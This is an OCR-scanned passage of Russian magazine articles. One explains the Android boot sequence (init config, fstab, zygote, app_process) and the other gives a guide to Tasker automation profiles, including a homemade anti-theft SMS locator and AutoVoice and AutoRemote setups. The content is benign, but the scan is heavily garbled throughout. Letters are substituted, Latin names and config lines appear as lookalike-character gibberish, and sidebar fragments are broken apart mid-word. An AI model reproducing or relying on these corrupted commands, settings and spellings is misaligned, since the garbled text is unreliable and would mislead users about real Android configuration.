прочие оп1дии 

Обычно в нем содержатс^ инструкиии по подклкзченикз фаиловых систем из вну- 
тренних ЫАЫО-разделов к каталогам /зузТепл (ОС), /с!а1:а (настроики приложении) 
и /сасһе (кешированные данные). Однако, слегка изменив әтот фаил, мы можем 
заставитв јгн{ загрузитв систему с карты пам^ти. Дл^ әтого достаточно разбитв кар- 



ту пам^ти на три-четыре раздела: 1 Гб / ехТ4, 2 Гб / ехТ4, 1 Гб / ехТ4 и оставшеес^ 
пространство Та1:32. Далее необходимо определитв имена разделов карты пам^ти 
в каталоге /с!еу (дл^ разныхустроиств они отличакзтс^) и заменитв ими оригиналв- 
ные имена устроиств в фаиле Тз1:ао. 

В кон1де блока ооо! тгг., скорее всего, встретит команду с1а55_51аг1 сЈетаиН, котора^ 
сообидит, что далее следует запуститв все перечисленные в конфиге службы, име- 
кзидие отношение к классу сЈеТаиИ:. Описание служб начинаетс^ с директивы зеплсе, 
за которои следует им^ службы и команда, котора^ долж- 
на бытв выполнена дгт ее запуска. В отличие от команд, 
перечисленных в блоках, службы должны работатв все 
врем^, позтому на прот^жении всеи жизни смартфона тИ: 
будет висетв в фоне и следитв за әтим. 

Современныи АпгЈгојс! вклкзчает в себ^ дес^тки служб, 
но две из них имекзт особыи статус и определ^кзт весв 
жизненныи и,икл системы. 



И НпсЈгспсЈ ТбТаһ ТПе. 

#<_гс> <тпТ_ро!пТ> <Туре> <тпТ_Т1ад_ 

# Тһе ТПезузТет ТһаТ соп1а1П5 Тһе Т 1 1е5у51ет сһескег Ыпагу (Тур1са11у /зузТет) саппоТ 

# 5рес1Ту МҒ__НЕСК, апс1 т_5Т соте һеТоге апу Т 1 1езу _1етз ТһаТ _о зрес 1 ■Ғу МҒ_СНЕСК 

Н Не гетсипТ _есаи5е _е Т 1гз1 тоип! а5 гш 1п огсјег 1о депегаТе НУ5 1 зутПпк. 5ее 1пН.гс Тог [ЈеТ 

/_еу/Ыоск/р1аТТогт/5_һс1-Тедга .З/һу-пате/РРР /^узТет ех14 го,гетоип1 

/_еу/Ыоск/р1аТТсгт/5_һс1-1едга .З/һу-пате/СРС /сасһе ех14 поаИте^по 

/_еу/Ыоск/р1а1Тогт/5_һс1-Тедга .3/һу-пате/ШР /_аТа ех!4 поа11те,по 
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- Т51а_.саг_һи [Кеа_оп1у] 1/9 11% 



Типичное содержимое фаила Гз1:аһ 



ШАГ ЧЕТВЕРТЫИ. 2ҮСОТЕ И АРРРКОСЕ35 

На определенном әтапе загрузки \п\Х встретит в кони,е конфига 
примерно такои блок: 

5егҮ1се 2у§о"се_/зу5"_ет/Ып/арр_ргосе55 -Х2у§оте _<->_ 
/5у5"сет/Ы п -- гу^от е - -5ТагТ: -5у51:ет-5ег уег 
с1а55 (Је-Ғаи1Т: 

50скет 2у§оте 5Тгеат 660 гоо т 5у5Тет 

опге5"са гТ: уу/гЈте /5у5/ апс!гоЈс1_роыег/гедие5Т:_5Т:аТ: е <-■ 

ыаке 

опге5"_агТ: мг_.те /5у5/роыег/5"_аТ:е оп 

опге5"сагТ: ге^гагТ: тесИа 
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Кроме стандарт- 
ныхтриггеров, тл" 
позвол^етопреде- 
л^твсобственные 
триггеры, которые 

мг\г\#т гчлаг^отыоат- 



опгевгагг гезгагг пета 



оииии шшиш 



Әто описание службы 2удо1:е, клкзчевого компонента лкзбои 
Апс!гоЈс1-системы, которыи ответственен за инии,иализаи,икз, 
старт системных служб, запуск и остановку полызователв- 
ских приложении и многие другие задачи. 2удо1:е запускаетс^ 
с помоидвкз неболвшого приложени^ /зуз^ет/Ып/арр ргосезз, 
что оченв хорошо видно на приведенном выше куске конфи- 
га. Задача арр ргоссезз — запуститв виртуалвнукз машину 
ОаМк, код которои располагаетс^ в раздел^емои библиотеке 
/5у51ет/По/Иоапс1гоЈс1_гиптЈте.50, а затем поверх нее запуститв 
2удо*е. 

Когда все әто будет сделано и 2удо1:е получит управление, 
он начинает формирование среды исполнени^ Јауа-приложе- 
нии с помоидвкз загрузки всех Јауа-классов фреимворка (сеи- 
час их более 2000). Затем он запускает 5у51епл_5еп/ег, вклк> 
чакзидии в себ^ болвшинство высокоуровневых (написанных 
на Јауа) системных сервисов, в том числе \Л/јпс!о\л/ Мападег, 
51аЈи5 Ваг, Раскаде Мападег и, что самое важное, АстЈуКу 
Мападег, которыи в будуидем будет ответственен за получение 
сигналов о старте и завершении приложении. 

После зтого 7.удо\е открывает сокет /сЈеу/зоске^/гудо^е 
и уходит в сон, ожида^ данные. В әто врем^ запуиденныи ра- 
нее Астјујгу Мападег посылает широковеидателвныи интент 
1п1еп1.САТЕӨОВҮ_НОМЕ, чтобы наити приложение, отвеча- 
кзидее за формирование рабочего стола, и отдает его им^ 
ТудоХе через сокет. Последнии, в свокз очередв, форкаетс^ 
и запускает приложение поверх виртуалвнои машины. Вуал^, 
у нас на әкране по^вл^етс^ рабочии стол, наиденныи Астјујгу 
Мападег и запуиденныи 2удо1:е, и статусна^ строка, запуиденна^ 
зу51:ет_5еп/ег в рамках службы 51:а1:и5 Ваг. После тапа по икон- 
ке рабочии стол пошлет интент с именем әтого приложени^, 
его примет Астјујгу Мападег и передаст команду на старт при- 
ложени^ демону 2удо1:е. 

Все әто может выпгтдетв несколвко непон^тно, но самое 
главное — запомнитв три простые веиди: 
• Проиесс запуска АпсЈгоЈсЈ делитсл на две клкзчевые ста- 
дии: до 2удо1е и после. До старта 2удо1:е система инии,и- 
ализирует низкоуровневые компоненты ОС. Әто такие опе- 
раиии, как подклкзчение (монтирование) фаиловых систем, 
запуск низкоуровневых служб (например гНс!, отвечакзидии 
за работу с С5М-модемом, 5игТасеҒ1тдег, управл^кзш,ии тем, 
что изображено на зкране, үо1с!, управл^кзидии подклкзченны- 
ми фаиловыми системами). После запуска 2удо1:е начинаетс^ 
иниииализаии^ исклкзчителвно Јаүа-компонентов, которые 
составлжот 80% операиионнои системы. Әтим, в частности, 



отсамыхразных 
событии: подклк)- 
чени^устроиства 
к115В, изменени^ 
состолнил смартфо- 
наилиизменени^со- 
сто^ни^системных 
переменных. 




Офиииалвна^доку- 
ментаии^ ЈпЛ.гсвис- 
ходниках АпсЈгоЈс! 
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фаила/5у5/тос1и1е/ 
1ошпетогукШег/ 
рагате1ег5/тјп!гее 

Каталогова^ 
структура АпсЈгоЈс! 

Описание фоновых 
служб 
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Кромевсегопроче- 
го, АсМу Мападег 
такжезанимаетс^ 
убииствомфоно- 
выхприложении 
при нехватке пам^ти. 
Значени^ порогов 
свободнои пам^ти 
содержатсл вфаи- 
ле/5у5/тос1и1е/ 
1ошпетогукШег/ 
рагате1ег5/тјп!гее. 



полвзуетс^ известныи фреимворк Хрозес!, которыи при установке подмен^ет арр 



ргосезз на собственнукз модифии,ированнук) версикз, способнукз перехватыватв вы- 
зовы лкзбых Јаүа-классов, подмен^^ их на лкзбые другие. Именно позтому у модулеи 
Хрозес! такие широкие возможности по модификаи,ии внешнего вида и поведени^ 
Апс!гоЈс1. На самом деле они ничего не измен^кзт в системе, а просто заставл^кзт ее 
исполвзоватв сторонние компоненты вместо своих. 

• Јауа-приложенил никогда не запускакггсл «с нулл». Когда 2удо1:е получаетзапрос 
на старт приложени^ от АсШгу Мападег, он не запускает новукз виртуалвнукз машину, 
а просто форкаетс^, то еств копирует сам себ^ и затем запускает поверх полученнои 
копии виртуалвнои машины нужное приложение. Такои прини,ип работы позвол^ет, 
во-первых, свести расход пам^ти к минимуму, так как Ыпих при форке копирует пам^тв 
в режиме сору-оп-\л/пт.е (новыи проиесс ссылаетс^ на пам^тв старого), а во-вторых, су- 
шественно ускоритв запуск приложени^: форк проиесса происходит намного быстрее 
запуска новои виртуалвнои машины и загрузки нужных приложеникз Јаүа-классов. 

• В АпсЈгојсЈ повсеместно исполвзукггсл интенты. Дл^ обидени^ между собои ком- 
поненты Апс!гоЈс1 никогда не примен^кзт пр^мои вызов проиедур и классов. Вместо 
зтого исполвзуетс^ система сообидении (интентов), котора^, кроме высокого уровн^ 
безопасности, дает также множество других вкусностеи, таких как, например, воз- 
можноств вызватв приложение, ничего о нем не зна^. Выше п уже писал, что дл^ за- 
пуска рабочего стола системе достаточно послатв интент 1п1еп{.САТЕС0ПҮ_Н0МЕ, 
на которыи откликнетс^ лкзбое приложение, способное выполн^тв функиикз лончера. 
Таким же образом работает кнопка «Поделитвс^», а также множество других компо- 
нентов системы. 
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Системные службы и потоки ^дра 

выводы 

Во многом АпсЈгоЈо! силвно отличаетс^ от других ОС, и с наскоку в нем не разобратв- 
с^. Однако, если пон^тв, как все работает, открывакзтс^ просто безграничные воз- 
можности. В отличие от Ј05 и \Л/то!о\л/5 Рһопе, операи,ионка от гугла имеет оченв 
гибкук) архитектуру, котора^ позвол^ет сервезно мен^тв ее поведение без необхо- 
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димиыи миисив ^ид. о иы тшипы ве илучаев диысиичпи мидмисштБ пужпыс 1чип- 

фиги и скрипты. 




Х-МоЫ1е 



Профилвнал 

задача 




ИСП0ЛВЗУЕМТАЗКЕП 
НАПОЛНУКЗ КАТУШКУ 



«А өстһ ли в ЈОЗ что-то подобное Тазкег?» — 
зачастунз әтот вопрос сводит на нет лобые 
споры о мобилвных операиионных системах. 
Ни в јОЗ, ни в \Л/Јпс1о\л/з МоЫ1е нет инстру- 
мента, хотл бы отдаленно напоминанзидего 
әто приложение. Длл многих продвинутых 
полвзователеи Тазкег уже давно стал инстру- 
ментом из разр^да тиз! һауе, способным 
заменитв деслтки платных приложении. Ему 
посвлш,ены иелые саиты и форумы, но в на- 
шем журнале о Тазкег писали всего один раз. 



Что такое Тазкег? Әто инструмент автоматизаиии смартфона, позвол^кзидии 
запрограммироватв реаки,икз устроиства на то или иное системное и не оченв 
событие. Тазкег, например, может отреагироватв на переворот смартфона 
әкраном вниз и в ответ отклкзчитв звук. Он может сработатв в момент падени^ 
уровн^ зар^да батареи до 30% и перевести смартфон в режим 2Ө. С помоидыо Тазкег 
можно запрограммироватв вклкзчение ӨРЗ в ответ на запуск приложени^ Өоод1е Марз 
или вклкзчение режима полета по ночам. 

Практически лкзбое системное событие, св^занное с сенсорами или состо^нием 
устроиства, может бытв исполызовано Тазкег дгт запуска того или иного деистви^, 
приложени^, вывода на әкран информаиии или генераиии диалоговых окон с раз- 
личными әлементами управлени^. Поуровнкз возможностеи Тазкегуже превратилс^ 
в полноиеннук) визуалвнукз среду программировани^, котора^ может бытв расши- 
рена за счет многочисленных плагинов, доступных в маркете. 

Хочешв создатв свои собственные голосовые команды? Нет проблем, в маркете 
еств плагин АиЈоУоЈсе. Нужна возможноств автоматического удаленного управлени^ 
другим устроиством или ПК? Дл^ зтого еств Аи1:оВето1:е. А как насчет доступа к низ- 
коуровневым настроикам Апс!гоЈс1? Ктвоим услугам Зесиге ЗеШпдз. 

КАК РАБОТАЕТ ТА8КЕП 

Как 9\ уже сказал ранее, приниип работы Тазкег основан на ре- 
акиии наопределенныесобыти^ и изменени^ состо^ни^ смарт- 
фона. В терминологии Тазкег они называкггс^ контекстом. 
К контексту можно прив^затв ту или инукз задачу, котора^ со- 




Евгении Зобнин 

апаҮоЈсЫгееЈ.пеЈ 




стоит из одного или несколвких деиствии. Деиствием может 
бытв что угодно, от запуска приложени^ до изменени^ опре- 
деленных настроек. В том случае, если речв идет о продолжи- 
телвном контексте (с дев^ти утра до п^ти вечера, местополо- 
жение и прочее), а не одиночном событии (запуск приложени^, 
например) может суидествоватв также и «выходна^ задача», 



АиЈоУоЈсезависит 
отприложени^ 
«6!оод1еПоиск» 

и без него работатв 
отказываетсл. 



шғо 



котора^ сработает после завершени^ контекста. 

Вместе св^зка из контекста, задачи и последователвности деиствии называетс^ 
профилем. Сразу после запуска Тазкег предложит создатв первыи профилв — на- 
жатв «плкзс» внизу әкрана и выбратв нужное событие или контекст (например, вре- 
м^). Далее он предложит прив^затв к нему задачу, датв еи им^ и определитв нужные 
деистви^. После определени^ деиствии профилв станет активным. В лкзбое врем^ 
ты сможешв әкспортироватв профилв и выложитв в сетв, чтобы другие смогли ис- 
полвзоватв его. 

Кроме профилеи, контекстов и задач, в Тазкег еств понатие «сиена». Әто своего 
рода заскриптованные диалоговые окна с кнопками, слаидерами и другими әлемен- 
тами интерфеиса Апс1гојс1. Сиену можно создатв с помош^кз визуалвного редактора, 
располагакзшегос^ на третвеи вкладке главного әкрана Тазкег, а затем свазатв с кон- 
текстами и задачами, получивтаким образом почти полноиенное приложение. С помо- 
шыо Тазкег Арр Ғастогу его можно упаковатв в АРК-пакет и выложитв в Соод1е Р1ау. 

Набор встроенных в Тазкег деиствии можно суидественно расширитв с помоидыо 
сторонних плагинов, которые в огромном количестве доступны в Өоод1е Р1ау. О не- 
которых из них 9\ уже сказал выше, другие мы рассмотрим позже. Плагины Тазкег 
еств в комплекте многих известных приложении, так что их тоже можно автоматизи- 
роватв. В частности, Тазкег способен управл^тв такими приложени^ми, как Зсгееп 
ҒИтег, Взупс Васкир, Ғо1с!ег5упс, ОазһС1оск. 

М1Ј5Т НАУЕ ПРОФИЛИ 

Начнем с самых простых, но зачастуго жизненно необходимых профилеи. Создатв их 
можно за несколвко секунд, а полвзы будет много. Вот те, что в разное врем^ так или 
иначе исполвзовал 

Управление взмахом 

В некоторых фирменных прошивках уже еств функ1дил управлени^ взмахом, котора^ 
позвол^ет переклкзчатв композии,ии или отвечатв на звонок, встр^хнув смартфон. 
Само собои, сходнукз функ1дионалвноств можно повторитв и с помоидыо Тазкег. Вот 
алгоритм настроики: 

Контекст: Событие -> 5еп50 г -> 5һаке -> АхЈ5: 1е-ҒЕ-КЈ§һ1: 
Задача: Зкра н -> Блокироватв 

Әто описание профил^, которыи будет отклкзчатв әкран после тр^ски смартфона 
в руке влево-вправо (Ахјз: 1_етт.-ВЈдһт). В качестве задачи можно прив^затв и лкзбые 
другие доступные в Тазкег деистви^. Например, «Аудио — > Громка^ св^зв» или «Те- 
лефон — > Начатв разговор». Можно также настроитв запуск приложени^ с помоидыо 
«Приложение — > Запуститв приложение». 



Вклк>чение режима полета по ночам 

Нет никакого смысла держатв смартфон вклкзченным ночыо. С другои стороны, ав- 
томатическое вклкзчение по утрам настроитв тоже нелыз^ (така^ функ1дил еств толв- 
ко в китаиских смартфонах), но можно ставитв на ночв режим полета. Чтобы проде- 
латв такое с помоидыо Тазкег, придетс^ установитв плагин Зесиге ЗеттЈдз (начина^ 
с Апс1гоЈс1 4.2 Өоод1е заблокировала возможноств управл^тв режимом полета сто- 
ронним приложени^м), а далвше настроитв профилв таким образом: 

Контек ст: Времл -> с 1 :ӨӨ до 7:00 

Задача: Плаги н -> Бесиге $е^Јп§5 -> Коо1: Ас1:Јоп5 -> <-■ 
А1гр1апе Мос1е 

Дл^ выбора деистви^ в самом плагине следует нажатв 
на значок карандаша р^дом с надписыо «Конфигураии^». Вме- 
сто режима полета можно исполызоватв «Аудио — > Режим ти- 
шины» дл^ вклкзчени^ беззвучного режима. 

Запуск плеера при подклк>чении наушников 

Один из самых попул^рных профилеи. Конфигураии^: 

Контек ст: Состо ание -> Аппаратура -> Наушники 

подклкнены 

Задача: Приложени е -> Запуститв приложение - > <-■ 
Выбираем нужныи плеер 

Также в задачу можно добавитв дополнителвное деиствие, регулирукзидее громкоств 
(Аудио — > Громкоств воспроизведени^). 

Управление лркостыо 

На отделвных устроиствах, которые не часто выносишв на улии,у (например, план- 
шетах), ^ркоств удобнее регулироватв вручнукз. А еиде удобнее с помоидыо Тазкег. 
На моем планшете, например, еств два профил^: 

Контекст: Времл - > с 9:00 до 20:00 
Задача: Зкра н -> ^ркоств диспле л -> 1 00 
Контекст: Врем л -> с 20:01 до 8: 59 
Задача: Зкра н -> ^ркоств диспле л -> Ө 

В дневное врем^ суток ^ркоств устанавливаетс^ на третв от максималвнои (макси- 
малвна^ — зто 255), в осталвное врем^ — на минимум. Естественно, автоматическое 
управление ^ркостыо следует отклкзчитв. 

Запуск 11$В-тизеринга при подклк>чении к ПК 

Идеалвныи вариант дл^ тех, кто часто проводит врем^ вне дома с ноутбуком за пле- 
чом. Оченв простои и полезныи профилв: 
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Аи1о\/оЈсеспособен 
интегрироватвс^ 
в6оод1е1\1ом. Что- 
бы заставитвего 
сделатв зто, необ- 
ходимоустановитв 
фреимворкХрозес! 
искачатв61оод1е 
1МомАР1черезна- 
строики АиЈоУоЈсе. 



Контекст: Состолние -> Подклкнено по 115В 
Задача: Сетв -> Интернет по 1Ј5В 



Сохранение әнергии при достижении 
30-прочентного уровнл зарлда батареи 

Честно говор^, п не поклонниктаких методов әнергосбережени^, но многим, как го- 
воритс^, нравитс^. Смысл в том, чтобы заставитв смартфон автоматически отклкз- 
чатв ЗӨ, ӨРЗ, Ш\-Ғ\ и устанавливатв минималынукз ^ркоств диспле^ при достижении 
критического уровнт зар^да. 



Контекст: Состолние ^>^Уровенв зарлдки -> от 0 до ЗӨ 
Задача : 

Зкра н -> ^рко ств дисплел -> 0 



Сетһ -> Моб. данные -> Толһко 2С 



Сет в -> Стат ус Ы± - Ғ ± -> Выклкјчитһ 



Плаги н -> 5есиге 5ет.т.Јп§5 -> 5у5Т_ет+ Аст_10П5 -> СР5 -> О-Ғ-Ғ 
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^лАӨ 14:15 


Ф Зесиге ЗегИпдз \ 
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ШҒО 0РТ10М5 8Ү8ТЕМ+ дРРе^ 7 


РВ0ҒИЕ5 ТАЗҜЗ 


5СЕМЕ5 


Зуз1:ет+ МосУе 


Зһаке 1_е(Шдһ1 ^| 




От 02:00 До 10:00 



Тһе Зузтегт Мос1и1е 15 гһе пехг еуо1иһоп оНһе 
Зесиге ЗеШпдз Не1рег арр. 

ТЫз тосМе 18 типсгЈопаПу едшуа1епт го гһе 
1едасу Не1рег арр Һи1 гЈоез пог гедшге әп 
ас1с]Шопа1 арр То һе тзтаПео" ог тоуео 1 то Гһе 
еузтепп раггШоп. II \л/огкс һу дгапТтд зузГет 
регтЈззЈопз го Зесиге ЗегПпдз изтд гоот 
ассезз. Тһе рептмззЈопз \лл11 гетат дгапГес! 
асгозЕ арр ирдгагЈез апс! ВОМ ирдгас!ез. 1гуои 
уујзһ 10 сИеаЫе т.Ыб тогЈи1е, уои сап с!о ео һу 
тоддИпд тһе һи!топ аооуе ог оу гетоутд апс! 
ге-ЈпзтаШпд Зесиге Зетхтдз. 



Подклмчено к IV/// сети РШһ 



Получено текст. сообш,. 5М5 




Получено 
ф текст. сообид. 1_оса1е Рһопе 

5М5, *, 1оса:е... 



Получено текст. сообш,. 5М5 





Рис. 1. Послеустановки Бесиге ЗеМтдз следуетактиви- 
роватв модулв 5у51епп+ 



Рис.2. Стандартные профили 
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Зсгееп Оп 



Зсгееп 01т 



А!гр1апе Мос1е 



□ЈзаЫе Зупс 



ЕпаЫө Зупс 



Еоса1:е Рһопе 
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Изменение зад... 

' 1_оса{е Рһопе 
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1. Зесиге ЗеШпдз 

Конфигура^ип 0Р5 ЕпаЫес! 






2. Ждатһ 

Мсеҝ. 0 Секунды 30 Минуты 0 Чәс. 0 




3. Получитһ коорд-ты 

Источник Лнобои Задержка (сек.) 1 00 


X 


4. Отправитһ ЗМЗ 

Номер (число) +7982651 4381 







НеМо Меззаде 
АиШВето1е 

0> 



+ 



Рис. 3. Набор задач на все случаи жизни 




Рис. 4. «Задача» антивора состоит всего из четырех 
деиствии 



АВТ0МАТИЗА1ЈИЛ В ЗАВИСИМОСТИ ОТ МЕСТОПОЛОЖЕНИЛ 

Очевидно, что в зависимости от твоего местоположени^ смартфон должен деиство- 
ватв по-разному. Например, вне дома должен бытв вклкзчен пин на әкране блоки- 
ровки и ӨРЗ, в то врем^ как \Л/ј-ҒЈ можно отклкзчитв. Дома пин блокировки не нужен, 
зато нужен Ш\-Ғ\ и высока^ громкоств звонка (чтобы ты смог услышатв смартфон, 
подклкзченныи к зар^днику, наход^св на кухне). На работе/учебе лучше вклкзчитв ре- 
жим вибраиии, а в некоторых случа^х настроитв автоматическии ответ на 5МЗ. 

У Тазкег еств нөсколһко способов определени^ местоположени^. Әто информа- 
иу\п от спутников ОРЗ, информаиј/т от сотовых вышек, факт подклкзченил к \Л/Ј-ҒЈ-се- 
ти с определенным именем или даже нахождение р^дом с такои \Л/Ј-ҒЈ-сетвкз. Наи- 
более әкономичныи и универсалвныи из них — зто информаи,и^ от вышек, однако 
при не слишком плотном покрытии сети они могут даватв неточнукз информаи,икз 
с разбросом в несколвко километров. В әтом случае лучше примен^тв ориентирова- 
ние по\Л/Ј-ҒЈ-сет^м. Даже в посто^нно вклкзченном состо^нии\Л/ј-Ғј гораздо әкономич- 
нее модул^ ОРЗ, которыи не сможетуснутв, если его будет постолнно дергатв Тазкег. 

Далее ^ привел три разных профил^ Тазкег дгт дома, улииы и работы, основан- 
ные на ориентаиии по \Л/Ј-ҒЈ-сет^м. Профилв дгт дома: 



Контекст: состолние -> сет в -> подклкнено к Ы1-Ғ1 -сети -> има сети 



Задача : 



Аудио -> Громкостһ звонка 


-> 


7 


Сетһ -> Автосинхронизаиил 


-> 


Выклкјчитв 


Плагин -> 5есиге 5ет.т.1п§5 


-> 


5у5Т.ет+ Аст_10П5 -> СР5 -> 0-Ғ-Ғ 


Плагин -> Бесиге 5ет.т.1п§5 


-> 


Коот. Аст.10П5 -> 1л11ге1е55 АРВ -> Оп 


Плагин -> Бесиге 5ет.т.п.п£5 


-> 


Оеү АсЈпип Аст.п.оп5 -> Ра55ыогс1/Р1п -> 015аЫес1 



Что делает әтотпрофилв: устанавливаетмаксималвнук) громкоствзвонка, отклкз- 
чаетавтосинхронизаи,ик) (зачем получатвуведомлени^ о писвмахдома?), отклкзчает 
ӨРЗ, вклкзчает АОВ по \Л/ј-ҒЈ (дгт управлени^ смартфоном с ПК) и отклкзчает пин-код. 
Следукзидии профилв дгт улии,ы: 



Задача : 


Аудио -> Громкоств звонка 


-> 


4 


Сетһ -> Автосинхронизаиил 


-> 


Вклкјчитв 


Плагин -> 5есиге 5ет.т.п\п§5 


-> 


5у5т.ет+ Аст.п\оп5 -> СР5 -> Оп 


Плагин -> 5есиге 5ет_т_ј.п§5 


-> 


Коот. Аст.п\оп5 -> Ы1ге1е55 АОВ -> 0-Ғ-Ғ 


Плагин -> 5есиге 5ет.т.ј.п£5 


-> 


Оеү Ас1тп.п Аст.п\оп5 -> Ра55могс1/Рп\п -> ЕпаЫес! 



Профилвустанавливает настроики, противоположные профилкз «Дома». Послед- 
нии профилв «На работе/учебе»: 

Контек ст: Состо ание -> Сетв -> Подклкнено к ЫЈ-ҒЈ-сети -> Имл сети 
ЗадачаЈ^ 

Аудио -> Р ежим тишины -> Вибраи,ил 
Сет в -> Автосинхронизаи,и л -> Вклк нитв 

Плаги н -> 5есиге 5етт.п\п§ 5 -> 5у5т.ет+ Астп\оп 5 -> 6 Р5 -> 0-Ғ-Ғ 

Здесв вклкзчаетс^ вибраии^ вместо звонка, синхронизаии^ остаетс^ вклкзченнои, 
ӨРЗ отклкзчаетс^. В некоторых из зтих профилеи (особенно в последнем) удобнее 
будет исполһзоватвориентаиик) по сотовым вышкам. Дл^ әтого контекст достаточно 
заменитв на «Место». Откроетс^ карта, и на неи можно будет выбратвточное место- 
положение и радиус срабатывани^ контекста. Кнопку ӨРЗ внизулучше выклкзчитв. 



АНТИВОР СОБСТВЕННОГО ПРИГОТОВЛЕНИЛ 

В маркете еств масса самых разных приложении дгт зашиты от кражи смартфона. 
Ни в коем случае не буду настаиватв на их удалении и замене на Тазкег, а просто по- 
кажу, как повторитв ту же функ1дионалвноств с возможностыо точно подогнатв ее под 
собственные нужды. Сделатв әто оченв легко. Вот простеишии профилв. 

Конте кст: Те лефон -> Получено текст. сообшение - > Тип : 5М5, Отправите л в: <-■ 

«+7 . . . » , С одержание : «1осат.е» 

ЗадачаЈ^ 

Плагин -> 5есиге 5ет.т.п\п§5 -> 5у5т.ет+ Аст.п\оп5 -> СР5 -> Оп 
Та5к -> Ждатв -> 30 секунд 



Разно е -> Получитв координат ы -> Источник: лгобои 

Телеф он -> Отправитһ 5М5 -> Номер : «+7...» , Сообшение: «Рәт. е: %РАТЕ %Т1М Е. <-■ 
Ва±1:егу: %ВАТ Т. 1_осат.Јоп: %!.0С» 

При получении 5М5 с номера +7... с сообидением «1оса1:е» смартфон вклкзчит ӨР5, 
заснет на 30 секунд (чтобы смартфон смог наити спутники), получит координаты 
и отправит их на указанныи номер в таком формате: «Оа1:е: дата врем^. ВаНегу: про- 
□.ентзар^да. 1_оса1:Јоп: координаты». Дл^ получени^ точного местоположени^ на кар- 
те координаты достаточно будет вбитв в Өоод1е Марз. 

Обрати внимание, что дгт формировани^ 5М5 мы брали переменные. Их уста- 
навливает и обновл^ет сам Тазкег, позтому переменные можно исполызоватв в лк> 
бом текстовом поле внутри приложени^. Кроме перечисленных здесв, суидествуктг 
дес^тки других переменных, которые позвол^кзт получитв самукз разнукз информа- 
|дик), начина^ от статуса В1ие1оо1һ и заканчива^ текуидеи частотои работы прои,ессо- 
ра (их описание можно наити здесв ). 

Профилв можно расширитв и модифии,ироватв дл^ отправки 5М5 каж- 
дые п^тв минут (дл^ әтого можно исполызоватв деиствие «{азк — > Тог», ре- 
ализукзшее иикл), вклкзчитв блокировку смартфона с помоидыо пина, 
как показано в предыдуидем примере, заставитв смартфон позво- 
нитв на нужныи номер (Телефон — > Позвонитв), сделатв снимок (Медиа — > 
Фотоснимок) и отправитв его с помоидыо ММ5 (Телефон — > Создатв 5М5). При жела- 
нии можно создатв веб-приложение и обидатыз^ с ним с помоидыо НТТР Р05Т и ӨЕТ 
(Сетв^НТТР Роз*)! 

УПРАВЛЕНИЕ ГОЛОСОМ 

У Өоод1е еств превосходныи анализатор голоса, которыи по умолчаникз работает 
толвко в св^зке с Өоод1е 1Чо\л/. Но мы можем исполызоватв его и дгт создани^ про- 
филеи дл^ Тазкег, получив возможноств запускатв нужные нам деистви^ с помоидвкз 
голоса. Дл^ әтого понадобитс^ плагин АиТоУоЈсе стоимостыо один доллар и совсем 
чутв-чутв смекалки. Простеишии пример профил^ с исполызованием АиЈоУоЈсе бу- 
дет таким: 

Контек ст: Состо лние -> П лагин -> Аит_оУоЈсе Кесо§п12ес1 - > Еуепт. В еһауЈои г: <-■ 
ОПј Со шшапс! ҒЈ1т.ег : « Ответ на главныи вопрос жизни» 
Задача: Си гнал -> Зкст ренное сообшение -> Текст: «42» 

Әтот профил в сработает тогда, когда АиЈоУоЈсе распознает фразу «Ответ на глав- 
ныи вопрос жизни». Чтобы запуститв сам механизм распознавани^, можно исполв- 
зоватв виджет АиЈоУоЈсе, которыи выводит на әкран стандартныи диалог «Говори- 
те...» и по резулвтатам распознавани^ запускает нужныи профилы Другои способ: 
создатв новыи профилв, которыи сработает, например, при разблокировке әкрана 
и запустит деиствие «Плагин — > АиЈоУоЈсе Весодтге». В әтом случае диалог будет 
выведен автоматически. 

Еиде более интересныи способ исполвзовани^ АиЈоУоЈсе — әто механизм «посто- 
^нного распознавани^», которыи работает все врем^, пока вклкзчен әкран смартфо- 
на. В әтом случае команды можно будет произноситв когда угодно, и, если АиЈоУоЈсе 



их распознает, автоматически сраоотает нужныи просрилв. 
Чтобы вклкзчитһ «посто^нное распознавание», необходи- 
мо активироватв доступ внешних приложении в настроиках 
Тазкег (Настроики — > Разное — > Разрешитв внешнии доступ), 
а затем вклкзчитв в АиЈоУоЈсе настроику «СопИпоиз — > Тодд1е 
ЫзЈепег». Недостаток метода: посто^нныи обмен данными 
с Соод1е (или необходимоств переклкзчени^ на о1тПпе-дви- 
жок распознавани^ речи). 
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Рис.5. Главныи зкран Аи1о\/оЈсе Рис.6. Главныи зкран Аи1оРето1е с ОР-кодом 

и ссылкои на веб-интерфеис 



УДАЛЕННОЕ УПРАВЛЕНИЕ 

Аи1:оВето1:е — еиде один интересныи плагин отавтора Аи1:о\/оЈсе. Он позвол^ет управ- 
л^тв смартфоном удаленно множеством разных способов, таких как веб-интерфеис, 
плагин дл^ браузера, приложение дл^ \Л/Јпо!о\л/5/1Јпих, или с помоидвкз другого смарт- 
фона на базе Апо!гоЈо! или Ј05. С помоидвкз Аи1:оВепло1:е можно создатв профили, кото- 
рые будут срабатыватв при получении сигнала извне либо генерироватв такои сигнал 
в резулвтате какого-либо системного событи^. Две копии Аи1:оВето1:е, установленные 
на разные устроиства, позвол^т им обмениватвс^ информаи,иеи в автоматическом ре- 



жиме, в том числе с возможноствк) пересылки уведомлении, сообидении и активаи,ии 
определенных функи,ии на одном смартфоне в ответ на событие на другом. 

Сразу предупрежу, что стоимоств плагина составл^ет четыре доллара, однако 
в маркете еств и бесплатна^ верси^, единственное ограничение которои — длина 
команд до двух символов. В болвшинстве случаев зтого будет вполне достаточно 
дл^ отдачи таких команд, как «Отклкзчитв смартфон» или «Получитв координаты» 
(дл^ зтого и одного символахватит), но в случае реализаи,ии возможности пересыл- 
ки уведомлении, получени^ со смартфона информаи,ии и организаи,ии чего-то вроде 
чата придетс^ раскошелитвс^. 

Как и плагин из предыдуидего раздела, Аит.оРепло1:е — әто еиде и полноиенное 
приложение. После его запуска на әкране по^витс^ ссылка и ОР-код. Ссылку можно 
открытв в браузере, чтобы получитв доступ к веб-интерфеису управлени^ смарт- 
фоном, а ОР-код отсканироватв другим смартфоном с установленным Аитх>Репло1:е 
и св^затв два гаджета в сетв. Далее Аит.оРепло1:е можно начинатв исполызоватв 
в своих профил^х. 

Дл^ примера соединим с помоидыо Аит.оРетот.е планшет (има в Аит.оРетот.е: {аЫет.) 
и телефон (им^: рһопе) и создадим набор профилеи, с помоидвк) которых смартфон 
будет сообшдтв планшету, что он получил 5М5. На смартфоне создаем такои профилв: 
Контек ст: Событие -> Т елефо н -> По луче но текс товое 
сообшение 
3 а д а ч а: Плагин 
Ме55а§е: "55" 



